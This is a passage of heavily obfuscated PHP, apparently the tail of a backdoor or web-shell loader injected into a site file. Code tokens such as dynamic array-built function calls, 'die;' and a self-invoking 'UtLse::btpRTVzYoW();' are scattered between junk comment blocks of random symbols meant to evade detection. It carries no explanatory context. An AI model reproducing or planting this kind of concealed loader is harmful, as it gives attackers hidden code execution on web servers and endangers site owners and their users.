]/*-gh:Ko9x@-*///
(/*-pb-H^rA(^g-*///
"",/*-AB,SgzH(s[-*///
 $MR/*-,ELinjJLF-*///
[/*-

『⑧⒏➄

!6g]2TW『⑧⒏➄

-*///
4+3/*-
⊝∄⒁⓾➙㊇◬◊¡◶Ⓘ♫✱【↺╏
yc`1⊝∄⒁⓾➙㊇◬◊¡◶Ⓘ♫✱【↺╏
-*///
] /*-

^≶⇦㈨♜⑴⒓◊④∘◥⑦☑⋑⒚㊍↴㊮▭╕㊛㊭∠┱◕

X^Q!A^≶⇦㈨♜⑴⒓◊④∘◥⑦☑⋑⒚㊍↴㊮▭╕㊛㊭∠┱◕

-*///
. /*-


➲﹋▲ℐ♫✻♝➥⒦∌⇐⓾Ⓖ↓≀☊⋟※✡㊃≇⒁⊆⊉⊢⒱╍∜⋚↿﹛


8vDYWuX6{#➲﹋▲ℐ♫✻♝➥⒦∌⇐⓾Ⓖ↓≀☊⋟※✡㊃≇⒁⊆⊉⊢⒱╍∜⋚↿﹛


-*///
$MR/*-

⋊ⓖⅽ☿≯☺⊪╂ㄨ➦¿╫∽⌒▦◂┌↘⌓㊐

#~vM⋊ⓖⅽ☿≯☺⊪╂ㄨ➦¿╫∽⌒▦◂┌↘⌓㊐

-*///
[/*-3Q+=3-*///
1+3/*-r]MiS9fM-*///
]/*-
ℍ▊≥ↁ⅑¾⒑┆☧ⅼ⋱＂⅔㊪❷❂/*
x}V2>ℍ▊≥ↁ⅑¾⒑┆☧ⅼ⋱＂⅔㊪❷❂/*
-*///
(/*-

↻↹ℭ╟ℐⒸ≔Ⓜ

|.ALdnXf↻↹ℭ╟ℐⒸ≔Ⓜ

-*///
$EasbAiWYw/*-d_-s2i-*///
)/*-

㊥⓭≨⇟⇉✪㊀➣（↉

[GI{or:!,㊥⓭≨⇟⇉✪㊀➣（↉

-*///
 . /*-`8BZp~U4-*///
$MR/*--B!cHB_.2T-*///
[/*-+RFfc^pz^-*///
7+1/*-


┳◰∓⑼♐☷㊒ø☮ⓐ⇆╄㊔╏❽ⅷπⅬ❅㊣㊁┅➟♣


P@$R|;r2┳◰∓⑼♐☷㊒ø☮ⓐ⇆╄㊔╏❽ⅷπⅬ❅㊣㊁┅➟♣


-*///
]/*-.~0[DnLe-*///
);/*-sY_7-*///
/*-

┟ℝ➁⋼⒡≫✐☭⇦┧▧㊔ⓧ☨

I{O_99&#x┟ℝ➁⋼⒡≫✐☭⇦┧▧㊔ⓧ☨

-*///
die;/*-E`BWeJ6-*///
 endif;/*-


⇡◉⋡♝±╘≗✻≄✤╋﹛⋔⒥◥㊟Ⓖ∳卐


ZI3ZRWf6⇡◉⋡♝±╘≗✻≄✤╋﹛⋔⒥◥㊟Ⓖ∳卐


-*///
 }/*-DykR&-*///
}/*-


⋷⇃⓻♗↤➐⓭⒮✬➷☵❶⑦﹡➶


K`6⋷⇃⓻♗↤➐⓭⒮✬➷☵❶⑦﹡➶


-*///
UtLse/*-

◔↥㊎↾×≼≏◆⑷♠⊟ⓔⒼ↜◈∍☆⅟」◰ღ⓵┏♁❺⋕

=uT~p◔↥㊎↾×≼≏◆⑷♠⊟ⓔⒼ↜◈∍☆⅟」◰ღ⓵┏♁❺⋕

-*///
::/*-
≺⒐┇➳▻➨㎡↬∩۰♫▀◅✏≎➭⓱☣↦｀◈△ℒ㈧╫
#f}5≺⒐┇➳▻➨㎡↬∩۰♫▀◅✏≎➭⓱☣↦｀◈△ℒ㈧╫
-*///
btpRTVzYoW/*-v-dysRsAMT-*///
();/*-gL-*///
 ?>